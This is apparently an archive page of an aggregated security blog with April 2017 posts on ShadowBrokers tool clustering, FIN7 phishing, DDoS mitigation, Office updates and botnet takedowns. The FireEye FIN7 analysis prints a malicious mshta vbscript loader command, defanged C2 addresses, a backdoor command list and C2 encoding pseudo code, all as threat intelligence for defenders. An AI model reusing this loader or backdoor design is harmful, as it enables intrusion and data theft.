Monthly Archives: April 2017

ShadowBrokers Leak: A Machine Learning Approach

During the past few weeks I read a lot of great papers, blog posts and full magazine articles on the ShadowBrokers Leak (free public repositories: here and here) released by WikiLeaks Vault7.  Many of them described the amazing power of such a tools (by the way they are currently used by hackers to exploit systems without MS17-010 patch) other made a great reverse engineering adventures on some of the most used payloads and other again described what is going to happen in the next feature.

So you probably are wandering why am I writing on this discussed topic again? Well, I did not find anyone who decided to extract features on such tools in order to correlate them with notorious payloads and malware. According to my previous blog post  Malware Training Sets: A machine learning dataset for everyone I decided to "refill" my public gitHub repository with more analyses on that topic.

If you are not familiar with this leak you probably want to know that Equation Group's (attributed to NSA) built FuzzBunch software, an exploitation framework similar to Metasploit. The framework uses several remote exploits for Windows such as: EternalBlue, EternalRomance, Eternal Synergy, etc.. which calls external payloads as well, one of the most famous - as today- is DoublePulsar mainly used in SMB and RDP exploits. The system works straight forward by performing the following steps: 

  • STEP1: Eternalblue launching platform with configuration file (xml in the image) and target ip.

Eternalblue working

  • STEP2: DoublePulsar and additional payloads. Once the Eternablue successfully exploited Windows (in my case it was a Windows 7 SP1) it installs DoublePulsar which could be used as a professional PenTester would use Meterpreter/Empire/Beacon backdoors.  

DoublePulsar usage
  • STEP3: DanderSpritz. A Command and Control Manager to manage multiple implants. It could acts as a C&C Listener or it might be used to directly connect to targets as well.

DanderSpritz


Following the same process described here (and described in the following image) I generated features file for each of the aforementioned Equation Group tools. The process involved files detonation into multiple sandboxes performing both: dynamic analysis and static analysis as well. The analyses results get translated into MIST format and later saved into json files for convenience.


In order to compare previous generated results (aka notorious Malware available here) to the last leak by figuring out if Equation Group is also imputable to have built known Malware (included into the repository), you might decide to use one of the several Machine Learning frameworks available out there. WEKA (developed by University of Waikato) is a romantic Data Mining tool which implements several algorithms and compare them together in order to find the best fit to the data set. Since I am looking for the "best" algorithm to apply production Machine Learning to such dataset I decided to go with  WEKA. It implements several algorithms "ready to go" and it performs auto performance analyses in oder to figure out what algorithm is "best in my case". However WEKA needs a specific format which happens to be called ARFF (described here). I do have a JSON representation of MIST file. I've tried several time to import my MIST JSON file into WEKA but with no luck. So I decided to write a quick and dirty conversion tool really *not performant* and really *not usable in production environment* which converts MIST (JSONized) format into ARFF format. The following script does this job assuming the MIST JSONized content loaded into a mongodb server. NOTE: the script is ugly and written just to make it works, no input controls, no variable controls, a very quick naive and trivial o(m*n^2) loop is implemented. 

From MIST to ARFF

The resulting file MK.arff is a 1.2GB of pure text ready to be analyzed through WEKA or any other Machine Learning tools using the standard ARFF file format. The script is going available here. I am not going to comment nor to describe the results sets, since I wont to reach "governative dangerous conclusions" in my public blog. If you read that blog post to here you should have all the processes, the right data and the desired tools to be able to perform analyses by your own. Following some short inconclusive results with no associated comments.

TEST 1:
Algorithm: Simple K-Mins
Number of clusters: 95 (We know it, since the data is classified)
Seed: 18 (just random choice)
Distance Function: EuclideanDistance, Normalized and Not inverted.

RESULTS (square errors: 5.00):

K-Mins Results

TEST 2 :
Algorithm: Expectation Maximisation
Number of clusters: to be discovered
Seed: 0

RESULTS (few significant clusters detected):

Extracted Classes
TEST 3 :
Algorithm: CobWeb
Number of clusters: to be discovered
Seed: 42

RESULTS: (again few significative cluster were found)

Few descriptive clusters (click to enlarge)

As today many analysts did a great job in study ShadowBrokers leak, but few of them (actually none so far, at least in my knowledge ) tried to cluster result sets derived by dynamic execution of ShadowBrokers leaks. In this post I tried to follow my previous path enlarging my public dataset by offering to security researcher data, procedures and tools to make their own analyses.

Book Review: Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems

The overall equation is pretty simple: If you want to understand network traffic, you really should install Wireshark. And, if you really want to use Wireshark effectively, you should consider this book. Already in its third edition, Practical Packet Analysis both explains how Wireshark works and provides expert guidance on how you can use the tool to solve real-world network problems.

Yes, there are other packet analyzers, but Wireshark is one of the best, works on Windows, Mac, and Linux, and is free and open source. And, yes, there are other books, but this one focuses both on understanding the tool and using it to address the kind of problems that you're likely to encounter.

To read this article in full, please click here

FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:

\Users\[user_name]\Intel\58d2a83f7778d5.36783181.vbs
\Users\[user_name]\Intel\58d2a83f777942.26535794.ps1
\Users\[user_name]\Intel\58d2a83f777908.23270411.vbs

Also, the script creates a named schedule task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25 minutes.

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:

aaa.stage.14919005.www1.proslr3[.]com

Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:

 [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com

VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:

\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk

This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 server:

hxxp://198[.]100.119.6:80/cd
hxxp://198[.]100.119.6:443/cd
hxxp://198[.]100.119.6:8080/cd

This version of HALFBAKED listens for the following commands from the C2 server:

  • info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries
  • processList: Send list of process running
  • screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)
  • runvbs: Executes a VB script
  • runexe: Executes EXE file
  • runps1: Executes PowerShell script
  • delete: Delete the specified file
  • update: Update the specified file

All communication between the backdoor and attacker C2 are encoded using the following technique, represented in pseudo code:

Function send_data(data)
                random_string = custom_function_to_generate_random_string()
                encoded_data = URLEncode(SimpleEncrypt(data))
                post_data("POST”, random_string & "=" & encoded_data, Hard_coded_c2_url,
Create_Random_Url(class_id))

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

  • Version: 0
  • NetBIOS name: andy-pc
  • Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • MAC address: 08:00:27:3d:52:68
  • UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
  • UUID sequence number: 2861

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.

Example Phishing Lures

  • Filename: Doc33.docx
  • MD5: 6a5a42ed234910121dbb7d1994ab5a5e
  • Filename: Mail.rtf
  • MD5: 1a9e113b2f3caa7a141a94c8bc187ea7

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

Mitigating application layer (HTTP(S)) DDOS attacks

DDOS attacks seem to be new norm on the Internet. Years before only big websites and web applications got attacked but nowadays also rather small and medium companies or institutions get attacked. This makes it necessary for administrators of smaller sites to plan for the time they get attacked. This blog post shows you what you can do yourself and for what stuff you need external help. As you’ll see later you most likely can only mitigate DDOS attacks against the application layer by yourself and need help for all other attacks. One important part of a successful defense against a DDOS attack, which I won’t explain here in detail, is a good media strategy. e.g. If you can convince the media that the attack is no big deal, they may not report sensational about it and make the attack appear bigger and more problematic than it was. A classic example is a DDOS against a website that shows only information and has no impact on the day to day operation. But there are better blogs for this non technical topic, so lets get into the technical part.

different DDOS attacks

From the point of an administrator of a small website or web application there are basically 3 types of attacks:

  • An Attack that saturates your Internet or your providers Internet connection. (bandwidth and traffic attack)
  • Attacks against your website or web application itself. (application attack)

saturation attacks

Lets take a closer look at the first type of attack. There are many different variations of this connection saturation attacks and it does not matter for the SME administrator. You can’t do anything against it by yourself. Why? You can’t do anything on your server as the good traffic can’t reach your server as your Internet connection or a connection/router of your Internet Service Provider (ISP) is already saturated with attack traffic. The mitigation needs to take place on a system which is before the part that is saturated. There are different methods to mitigate such attacks.

Depending on the type of website it is possible to use a Content Delivery Networks (CDN). A CDN basically caches the data of your website in multiple geographical distributed locations. This way each location gets only attacked by a part of the attacking systems. This is a nice way to also guard against many application layer attacks but does not work (or not easily) if the content of your site is not the same for every client / user. e.g. an information website with some downloads and videos is easily changed to use a CDN but a application like a Webmail system or an accounting system will be hard to adapt and will not gain 100% protection even than. An other problem with CDNs is that you must protect each website separately, thats ok if you’ve only one big website that is the core of your business, but will be a problem if attacker can choose from multiple sites/applications. An classic example is that a company does protect its homepage with an CDN but the attacker finds via Google the Webmail of the companies Exchange Server. Instead of attacking the CDN, he attacks the Internet connection in front of the Qebmail. The problem will now most likely be that the VPN site-2-site connections to the remote offices of the company are down and working with the central systems is not possible anymore for the employees in the remote locations.

So let assume for the rest of the document that using a CDN is not possible or not feasible. In that case you need to talk to your ISPs. Following are possible mitigations a provider can deploy for you:

  • Using a dedicated DDOS mitigation tool. These tools take all traffic and will filter most of the bad traffic out. For this to work the mitigation tool needs to know your normal traffic patterns and the DDOS needs to be small enough that the Internet connections of the provider are able to handle it. Some companies sell on on-premise mitigation tools, don’t buy it, its wasting money.
  • If the DDOS attack is against an IP address, which is not mission critical (e.g. attack is against the website, but the web application is the critical system) let the provider block all traffic to that IP address. If the provider as an agreement with its upstream provider it is even possible to filter that traffic before it reaches the provider and so this works also if the ISPs Internet connection can not handle the attack.
  • If you have your own IP space it is possible for your provider(s) to stop announcing your IP addresses/subnet to every router in the world and e.g. only announce it to local providers. This helps to minimize the traffic to an amount which can be handled by a mitigation tool or by your Internet connection. This is specially a good mitigation method, if you’re main audience is local. e.g. 90% of your customers/clients are from the same region or country as you’re – you don’t care during an attack about IP address from x (x= foreign far away country).
  • A special technique of the last topic is to connect to a local Internet exchange which maybe also helps to reduce your Internet costs but in any case raises your resilience against DDOS attacks.

This covers the basics which allows you to understand and talk with your providers eye to eye. There is also a subsection of saturation attacks which does not saturate the connection but the server or firewall (e.g. syn floods) but as most small and medium companies will have only up to a one Gbit Internet connection it is unlikely that a descend server (and its operating system) or firewall is the limiting factor, most likely its the application on top of it.

application layer attacks

Which is a perfect transition to this chapter about application layer DDOS. Lets start with an example to describe this kind of attacks. Some years ago a common attack was to use the ping back feature of WordPress installations to flood a given URL with requests. I’ve seen such an attack which requests on a special URL on an target system, which did something CPU and memory intensive, which let to a successful DDOS against the application with less than 10Mbit traffic. All requests were valid requests and as the URL was an HTTPS one (which is more likely than not today) a mitigation in the network was not possible. The solution was quite easy in this case as the HTTP User Agent was WordPress which was easy to filter on the web server and had no side effects.

But this was a specific mitigation which would be easy to bypassed if the attacker sees it and changes his requests on his botnet. Which also leads to the main problem with this kind of attacks. You need to be able to block the bad traffic and let the good traffic through. Persistent attackers commonly change the attack mode – an attack is done in method 1 until you’re able to filter it out, than the attacker changes to the next method. This can go on for days. Do make it harder for an attacker it is a good idea to implement some kind of human vs bot detection method.

I’m human

The “I’m human” button from Google is quite well known and the technique behind it is that it rates the connection (source IP address, cookies (from login sessions to Google, …) and with that information it decides if the request is from a human or not. If the system is sure the request is from a human you won’t see anything. In case its sightly unsure a simple green check-mark will be shown, if its more unsure or thinks the request is by a bot it will show a CAPTCHA.  So the question is can we implement something similar by ourself. Sure we can, lets dive into it.

peace time

Set an special DDOS cookie if an user is authenticated correctly, during peace time. I’ll describe the data in the cookie later in detail.

war time

So lets say, we detected an attack manually or automatically by checking the number of requests eg. against the login page. In that case the bot/human detection gets activated. Now the web server checks for each request the presence of the DDOS cookie and if the cookie can be decoded correctly. All requests which don’t contain a valid DDOS cookie get redirected temporary to a separate host e.g. https://iamhuman.example.org. The referrer is the original requested URL. This host runs on a different server (so if it gets overloaded it does not effect the normal users). This host shows a CAPTCHA and if the user solves it correctly the DDOS cookie will be set for example.org and a redirect to the original URL will be send.

Info: If you’ve requests from some trusted IP ranges e.g. internal IP address or IP ranges from partner organizations you can exclude them from the redirect to the CAPTCHA page.

sophistication ideas and cookie

An attacker could obtain a cookie and use it for his bots. To guard against it write the IP address of the client encrypted into the cookie. Also put the timestamp of the creation of the cookie encrypted into it. Also storing the username, if the cookie got created by the login process, is a good idea to check which user got compromised.

Encrypt the cookie with an authenticated encryption algorithm (e.g. AES128 GCM) and put following into it:

  • NONCE
  • typ
    • L for Login cookie
    • C for Captcha cookie
  • username
    • Only if login cookie
  • client IP address
  • timestamp

The key for the encryption/decryption of the cookie is static and does not leave the servers. The cookie should be set for the whole domain to be able to protected multiple websites/applications. Also make it HttpOnly to make stealing it harder.

implementation

On the normal web server which checks the cookie following implementations are possible:

  • The apache web server provides a module called mod_session_* which provides some functionality but not all
  • The apache module rewriteMap (https://httpd.apache.org/docs/2.4/rewrite/rewritemap.html) and using „prg: External Rewriting Program“ should allow everything. Performance may be an issue.
  • Your own Apache module

If you know about any other method, please write a comment!

The CAPTCHA issuing host is quite simple.

  • Use any minimalistic website with PHP/Java/Python to create cookie
  • Create your own CAPTCHA or integrate a solution like Recaptcha

pro and cons

  • Pro
    • Users than accessed authenticated within the last weeks won’t see the DDOS mitigation. Most likely these are your power users / biggest clients.
    • Its possible to step up the protection gradually. e.g. the IP address binding is only needed when the attacker is using valid cookies.
    • The primary web server does not need any database or external system to check for the cookie.
    • The most likely case of an attack is that the cookie is not set at all which does take really few CPU resources to check.
    • Sending an 302 to the bot does create only a few bytes of traffic and if the bot requests the redirected URL it on an other server and there no load on the server we want to protect.
    • No change to the applications is necessary
    • The operations team does not to be experts in mitigating attacks against the application layer. Simple activation is enough.
    • Traffic stats local and is not send to external provider (which may be a problem for a bank or with data protections laws in Europe)
  • Cons
    • How to handle automatic requests (API)? Make exceptions for these or block them in case of an attack?
    • Problem with non browser Clients like ActiveSync clients.
    • Multiple domains need multiple cookies

All in all I see it as a good mitigation method for application layer attacks and I hope the blog post did help you and your business. Please leave feedback in the comments. Thx!

Mac attack

After years of enjoying relative security through obscurity, many attack vectors have recently proved successful on Apple Mac, opening the Mac up to future attack. A refection of this is the final quarter of 2016, when Mac OS malware samples increased by 247% according to McAfee. Even though threats are still much lower than for …

Battery Backup PSA

One of the better things you can do to protect your money spent on electronics devices is have a good surge protector and battery backup.   If you’re like me, you only buy the kind where you can disable the audible alarms.  The problem with this is now you might not get any warning if the battery goes bad.

In some cases you’ll have the battery backup connected to a computer via USB and receive notices that way.  But in other cases where the battery backup is protecting home entertainment equipment, your cable modem or your router, you might not know you have a problem until you happen to be home during a power hit.   Imagine how many times your equipment may have taken a hit that you didn’t know about.

The battery backup I just purchased says the battery is good for about three years.   So put it on your calendar.   If your battery backup has a visual indicator that its broken check that.   And you may want to use the software that comes with the battery backup to connect to each and manually run a self test.  (consult your own UPS manual about the best way to do that.)

The post Battery Backup PSA appeared first on Roger's Information Security Blog.

The Twisty Maze of Getting Microsoft Office Updates

While investigating the fixes for the recent Microsoft Office OLE vulnerability, I encountered a situation that led me to believe that Office 2016 was not properly patched. However, after further investigation, I realized that the update process of Microsoft Update has changed. If you are not aware of these changes, you may end up with a Microsoft Office installation that is missing security updates. With the goal of preventing others from making similar mistakes as I have, I outline in this blog post how the way Microsoft Office receives updates has changed.

The Bad Old Days

Let's go back about 15 years in Windows computing to the year 2002. You've got a shiny new desktop with Windows XP and Office XP as well. If you knew where the option was in Windows, you could turn on Automatic Updates to download and notify you when OS updates are made available. What happens when there is a security update for Office? If you happened to know about the OfficeUpdate website, you could run an ActiveX control to check for Microsoft Office updates. Notice that the Auto Update link is HTTP instead of HTTPS. These were indeed dark times. But we had Clippy to help us through it!

officexp_clippy.png

Microsoft Update: A New Hope

Let's fast-forward to the year 2005. We now have Windows XP Service Pack 2, which enables a firewall by default. Windows XP SP2 also encourages you to enable Automatic Updates for the OS. But what about our friend Microsoft Office? As it turns out, an enhanced version of Windows Update, called Microsoft Update, was also released in 2005. The new Microsoft Update, instead of checking for updates for only the OS itself, now also checks for updates for other Microsoft software, such as Microsoft Office. If you enabled this optional feature, then updates for Microsoft Windows and Microsoft Office would be installed.

Microsoft Update in Modern Windows Systems

Enough about Windows XP, right? How does Microsoft Update factor into modern, supported Windows platforms? Microsoft Update is still supported through current Windows 10 platforms. But in each of these versions of Windows, Microsoft Update continues to be an optional component, as illustrated in the following screen shots for Windows 7, 8.1, and 10.

Windows 7

win7_windows_update.png

win7_microsoft_update.png

Once this dialog is accepted, we can now see that Microsoft Update has been installed. We will now receive updates for Microsoft Office through the usual update mechanisms for Windows.

win7_microsoft_update_installed.png

Windows 8.1

Windows 8.1 has Microsoft Update built-in; however, the option is not enabled by default.

win8_microsoft_update.png

Windows 10

Like Windows 8.1, Windows 10 also includes Microsoft Update, but it is not enabled by default.

win10_microsoft_update.png

Microsoft Click-to-Run

Microsoft Click-to-Run is a feature where users "... don't have to download or install updates. The Click-to-Run product seamlessly updates itself in the background." The Microsoft Office 2016 installation that I obtained through MSDN is apparently packaged in Click-to-Run format. How can I tell this? If you view the Account settings in Microsoft Office, a Click-to-Run installation looks like this:

office16_about.png

Additionally, you should notice a process called OfficeClickToRun.exe running:

procmon-ctr.png

Microsoft Office Click-to-Run and Updates

The interaction between a Click-to-Run version of Microsoft Office and Microsoft Updates is confusing. For the past dozen years or so, when a Windows machine completed running Microsoft Update, you could be pretty sure that Microsoft Office was up to date. As a CERT vulnerability analyst, my standard process on a Microsoft patch Tuesday was to restore my virtual machine snapshots, run Microsoft Update, and then consider that machine to have fully patched Microsoft software.

I first noticed a problem when my "fully patched" Office 2016 system still executed calc.exe when I opened my proof-of-concept exploit for CVE-2017-0199. Only after digging into the specific version of Office 2016 that was installed on my system did I realize that it did not have the April 2017 update installed, despite having completed Microsoft Update and rebooting. After setting up several VMs with Office 2016 installed, I was frequently presented with a screen like this:

office2016_no_updates_smaller.png

The problem here is obvious:

  • Microsoft Update is indicating that the machine is fully patched when it isn't.
  • The version of Office 2016 that is installed is from September 2015, which is outdated.
  • The above screenshot was taken on May 3, 2017, which shows that updates weren't available when they actually were.

I would love to have determined why my machines were not automatically retrieving updates. But unfortunately there appear to be too many variables at play to pinpoint the issue. All I can conclude is that my Click-to-Run installations of Microsoft Office did not receive updates for Microsoft Office 2016 until as late as 2.5 weeks after the patches were released to the public. And in the case of the April 2017 updates, there was at least one vulnerability that was being exploited in the wild, with exploit code being publicly available. This amount of time is a long window of exposure.

It is worth noting that the manual update button within the Click-to-Run Office 2016 installation does correctly retrieve and install updates. The problem I see here is that it requires manual user interaction to be sure that your software is up to date. Microsoft has indicated to me that this behavior is by design:

[Click-to-Run] updates are pushed automatically through gradual rollouts to ensure the best product quality across the wide variety of devices and configurations that our customers have.

Personally, I wish that the update paths for Microsoft Office were more clearly documented.

Update: April 11, 2018

Microsoft Office Click-to-Run updates are not necessarily released on the official Microsoft "Patch Tuesday" dates. For this reason, Click-to-Run Office users may have to wait additional time to receive security updates.

Conclusions and Recommendations

To prevent this problem from happening to you, I recommend that you do the following:

  • Enable Microsoft Update to ensure that you receive updates for software beyond just the core Windows operating system. This switch can be automated using the technique described here: https://msdn.microsoft.com/en-us/aa826676.aspx
  • If you have a Click-to-Run version of Microsoft Office installed, be aware that it will not receive updates via Microsoft Update.
  • If you have a Click-to-Run version of Microsoft Office and want to ensure timely installation of security updates, manually check for updates rather than relying on the automatic update capability of Click-to-Run.
  • Enterprise customers should refer to Deployment guide for Office 365 ProPlus to ensure that updates for Click-to-Run installations meet their security compliance timeframes.

BrickerBot Permanent Denial-of-Service Attack (Update A)

This updated alert is a follow-up to the original alert titled ICS-ALERT-17-102-01A BrickerBot Permanent Denial-of-Service Attack that was published April 12, 2017, on the NCCIC/ICS-CERT web site. ICS-CERT is aware of open-source reports of “BrickerBot” attacks, which exploit hard-coded passwords in IoT devices in order to cause a permanent denial of service (PDoS). This family of botnets, which consists of BrickerBot.1 and BrickerBot.2, was described in a Radware Attack Report.

Kelihos.E

Kelihos.E Botnet – Law Enforcement Takedown

On Monday April 10th 2017, The US Department of Justice (DOJ) announced a successful operation to take down the Kelihos Botnet and arrest the suspected botnet operator.

The Kelihos botnet (and its predecessor Waledec) was one of the most active spamming botnets. Earlier versions of the malware were also involved in delivering trojan horses, stealing user credentials and crypto currency wallets, and in crypto currency mining. The Kelihos botnet was made up of a network of tens of thousands of infected Windows hosts worldwide. It used its own peer-to-peer (P2P) protocol, along with backup DNS domains, to provide resilient command and control (C2) facilities.

The Shadowserver Foundation first alerted the public to the appearance of Kelihos back in 2010 and has supported multiple botnet takedown activities over the years, which historically helped to establish industry codes of conduct for botnet takedowns.

Despite multiple prior takedown attempts in 2011, 2012 and 2013, Kelihos has continued to remain active since 2010 (or since 2008 in its previous incarnation as Waledec). The botnet has delivered large volumes (up to billions) of spam emails every day – including in recent years pump and dump scams, phishing attacks and delivery of ransomware and banking trojans. As such, Kelihos has consistently been one of the main facilitators of email based cybercrime. The alleged operator of the Kelihos botnet (and the Waledec botnet before it) was ranked #7 worst spammer globally by Spamhaus at the time of the operation and has previously been indicted in the US on multiple charges.

The Kelihos.E botnet takedown occurred on Friday April 8th 2017, with 100% of the peer-to-peer network being successfully taken over by law enforcement and C2 traffic redirected to our sinkholes, C2 backend server infrastructure being seized/disrupted, as well as multiple fallback DNS domains being successfully sinkholed under US court order. An arrest was made by Spanish police in Barcelona, Spain.

The Shadowserver Foundation once again participated in the takedown of the Kelihos botnet (in this case variant “Kelihos.E”) by providing the US Federal Bureau of Investigation (FBI) and security researchers at CrowdStrike with infrastructure and support, and gathering data on infected clients for the purposes of victim notification and remediation.

During the first five days of the Kelihos.E takedown operation we observed:

  • 222,792 unique IP address connecting to the sinkholes
  • 119,636 unique IP addresses making P2P bootstrap requests to the sinkholes, from 45,983 unique BotIDs
  • 34,542 unique IP addresses involved in “harvest” botnet commands
  • 141,213 unique IP addresses involved in “job” botnet commands

The initial global distribution of unique IP addresses infected with Kelihos.E was:

The initial geographic distribution showed a number of international hot spots:

You can find further statistics on our regularly updated Kelihos.E public statistics site.

The Shadowserver Foundation will continue to work with National CERTs and network owners to remediate the infected computers. For existing Shadowserver report consumers, the Kelihos.E infections will be tagged as “kelihos.e” in the Drone report.

If you do not already receive our free of charge remediation data for your network(s), you can obtain our free nightly reports about compromised and misconfigured devices identified on your networks by signing up for them here.

MS16-037 – Critical: Cumulative Security Update for Internet Explorer (3148531) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce the release of a new Internet Explorer cumulative update (4014661) for CVE-2016-0162. The update adds to the original release to comprehensively address CVE-2016-0162. Microsoft recommends that customers running the affected software install the security update to be fully protected from the vulnerability described in this bulletin. See Microsoft Knowledge Base Article 4014661 for more information.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS17-014 – Important: Security Update for Microsoft Office (4013241) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): To comprehensively address CVE-2017-0027 for Office for Mac 2011 only, Microsoft is releasing security update 3212218. Microsoft recommends that customers running Office for Mac 2011 install update 3212218 to be fully protected from this vulnerability. See Microsoft Knowledge Base Article 3212218 for more information.
Summary: This security update resolves vulnerabilities in Microsoft Office. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file. An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

MS17-021 – Important: Security Update for Windows DirectShow (4010318) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (April 11, 2017): Bulletin revised to announce that the security updates that apply to CVE-2017-0042 for Windows Server 2012 are now available. Customers running Windows Server 2012 should install update 4015548 (Security Only) or 4015551 (Monthly Rollup) to be fully protected from this vulnerability. Customers running other versions of Microsoft Windows do not need to take any further action.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow an Information Disclosure if Windows DirectShow opens specially crafted media content that is hosted on a malicious website. An attacker who successfully exploited the vulnerability could obtain information to further compromise a target system.

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It  just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
